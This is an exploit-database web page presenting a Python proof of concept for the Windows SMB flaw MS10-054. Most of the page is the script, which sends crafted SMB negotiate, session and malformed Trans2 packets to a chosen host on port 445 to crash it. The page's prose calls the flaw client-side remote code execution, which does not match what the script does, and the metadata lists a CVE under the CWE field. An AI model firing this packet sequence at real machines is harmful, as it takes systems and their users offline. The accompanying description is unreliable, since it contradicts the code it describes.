header-logo
Suggest Exploit
vendor:
Microsoft Windows
by:
Laurent Gaffie
9.3
CVSS
CRITICAL
This is a proof of concept for MS10-054 vulnerability. It is a remote code execution vulnerability in Microsoft Windows SMB Client. An attacker could exploit this vulnerability by convincing a user to connect to a malicious SMB server or by tricking a user into clicking on a specially crafted link. Successful exploitation of this vulnerability […]
119
CWE
Product Name: Microsoft Windows
Affected Version From: Windows 7, Windows Server 2008 R2
Affected Version To: Windows 7, Windows Server 2008 R2
Patch Exists: YES
Related CWE: CVE-2010-2550
CPE: o:microsoft:windows_7::sp1
Metasploit:
Other Scripts:
Platforms Tested: Windows
2010

MS10-054 Proof Of Concept by Laurent Gaffie

This is a proof of concept for MS10-054 vulnerability. It is a remote code execution vulnerability in Microsoft Windows SMB Client. An attacker could exploit this vulnerability by convincing a user to connect to a malicious SMB server or by tricking a user into clicking on a specially crafted link. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code with the privileges of the user.

Mitigation:

Apply the security patch provided by Microsoft for MS10-054 vulnerability. Disable SMBv1 on affected systems if it is not required.
Source

Exploit-DB raw data:

#!/usr/bin/env python
import sys,struct,socket
from socket import *

if len(sys.argv)<=2:
   print '#######################################################################'
   print '#   MS10-054 Proof Of Concept by Laurent Gaffie'
   print '#   Usage: python '+sys.argv[0]+' TARGET SHARE-NAME (No backslash)'
   print '#   Example: python '+sys.argv[0]+' 192.168.8.101 users'
   print '#   http://g-laurent.blogspot.com/'
   print '#   http://twitter.com/laurentgaffie'
   print '#   Email: laurent.gaffie{at}gmail{dot}com'
   print '#######################################################################\n\n'
   sys.exit()

host = str(sys.argv[1]),445

packetnego =  "\x00\x00\x00\x9a"
packetnego += "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packetnego += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc3\x15\x00\x00\x01\x3d"
packetnego += "\x00\x77\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
packetnego += "\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4d\x49\x43\x52"
packetnego += "\x4f\x53\x4f\x46\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x33"
packetnego += "\x2e\x30\x00\x02\x44\x4f\x53\x20\x4c\x4d\x31\x2e\x32\x58\x30\x30"
packetnego += "\x32\x00\x02\x44\x4f\x53\x20\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31"
packetnego += "\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f"
packetnego += "\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4e"
packetnego += "\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"

def tidpiduidfield(data):
    all_=data[28:34]
    return all_

def handle(data):
    ##Chained SMB commands; Session Setup AndX Request,Tree connect
    if data[8:10] == "\x72\x00":
       sharename = "\x00\x00\x5c\x5c\x5c"+str(sys.argv[2])+"\x00\x3f\x3f\x3f\x3f\x3f\x00"
       packetsession =  "\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
       packetsession += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd5\x15\x01\x00\x81\x2f"
       packetsession += "\x0d\x75\x00\x7a\x00\x68\x0b\x32\x00\x00\x00\x00\x00\x00\x00\x18"
       packetsession += "\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x3d\x00\x01\x01\x01"
       packetsession += "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
       packetsession += "\x01\x01\x01\x01\x01\x59\x4f\x00\x57\x4f\x52\x4b\x47\x52\x4f\x55"
       packetsession += "\x50\x00\x57\x69\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x57\x69"
       packetsession += "\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x04\xff\x00\x00\x00\x00"
       packetsession += "\x00\x01\x00"+struct.pack(">i", len(sharename))[3:4]+sharename
       print "[+]Session Query sent"    
       return struct.pack(">i", len(packetsession))+packetsession

    ##Trans2, Request, QUERY_FS_INFO Query FS Attribute Info
    if data[8:10] == "\x73\x00":
       packetrans = "\x00\x00\x00\x46"
       packetrans += "\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x01\xc8\x00\x00\x00\x00"
       packetrans += "\x00\x00\x00\x00\x00\x00\x00\x00"+tidpiduidfield(data)+"\x13\x00"
       packetrans += "\x0f\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
       packetrans += "\x00\x00\x00\x02\x00\x44\x00\x00\x00\x46\x00\x01\x00\x03\x00\x05"
       packetrans += "\x00\x00\x44\x20\x05\x01"
       print "[+]Malformed Trans2 packet sent\n[+]The target should be down now"
       return packetrans

def run():
    s = socket(AF_INET, SOCK_STREAM)
    s.connect(host)
    s.settimeout(2) 
    s.send(packetnego)
    print "[+]Negotiate Protocol Request sent"
    try:
      while True:
        data = s.recv(1024)
        s.send(handle(data))
    except Exception:
        pass
        s.close()
run()

Navigation

Suggest Exploit

Services By CQR

cqrsecured